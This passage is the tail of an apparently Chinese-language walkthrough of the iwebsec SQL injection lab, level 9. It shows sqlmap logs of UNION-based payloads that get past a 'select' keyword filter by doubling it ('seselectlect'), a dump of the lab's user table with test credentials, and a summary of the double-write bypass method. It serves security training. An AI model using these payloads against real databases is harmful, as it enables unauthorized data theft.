+----+-----------------------+----------+------------------------------------------------------+
[00:58:47] [INFO] table 'iwebsec.sqli' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/sqli.csv'
[00:58:47] [INFO] fetching columns for table 'user' in database 'iwebsec'
[00:58:47] [PAYLOAD] 1 union all seselectlect null,concat(0x716a6a6271,json_arrayagg(concat_ws(0x61666c6e6473,column_name,column_type)),0x717a787671),null from information_schema.columns where table_name=0x75736572 and table_schema=0x69776562736563-- -
[00:58:47] [PAYLOAD] 1 union all seselectlect null,concat(0x716a6a6271,ifnull(cast(column_name as char),0x20),0x61666c6e6473,ifnull(cast(column_type as char),0x20),0x717a787671),null from information_schema.columns where table_name=0x75736572 and table_schema=0x69776562736563-- -
[00:58:47] [DEBUG] performed 2 queries in 0.01 seconds
[00:58:47] [INFO] fetching entries for table 'user' in database 'iwebsec'
[00:58:47] [PAYLOAD] 1 union all seselectlect null,concat(0x716a6a6271,json_arrayagg(concat_ws(0x61666c6e6473,id,password,username)),0x717a787671),null from iwebsec.`user`-- -
[00:58:47] [PAYLOAD] 1 union all seselectlect null,concat(0x716a6a6271,ifnull(cast(id as char),0x20),0x61666c6e6473,ifnull(cast(password as char),0x20),0x61666c6e6473,ifnull(cast(username as char),0x20),0x717a787671),null from iwebsec.`user`-- -
[00:58:47] [DEBUG] performed 2 queries in 0.02 seconds
[00:58:47] [DEBUG] analyzing table dump for possible password hashes
Database: iwebsec
Table: user
[3 entries]
+----+----------+----------+
| id | password | username |
+----+----------+----------+
| 1 | pass1 | user1 |
| 2 | pass2 | user2 |
| 3 | pass3 | user3 |
+----+----------+----------+
[00:58:47] [INFO] table 'iwebsec.`user`' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/user.csv'
[00:58:47] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.71.151'
[00:58:47] [WARNING] your sqlmap version is outdated
[*] ending @ 00:58:47 /2022-11-25/
总结
SQL注入主要分析几个内容
(1)闭合方式是什么?iwebsec的第9关关卡为数字型,无闭合
(2)注入类别是什么?这部分是普通的数字型注入,使用union法即可注入成功
(3)是否过滤了关键字?很明显通过源码,iwebsec的第09关卡过滤了不区分大小写select关键字
了解了如上信息就可以针对性使用双写法进行SQL绕过渗透,使用sqlmap工具渗透更是事半功倍,以上就是今天要讲的双写法绕过型SQL注入内容,初学者建议按部就班先使用手动注入练习,再进行sqlmap渗透。
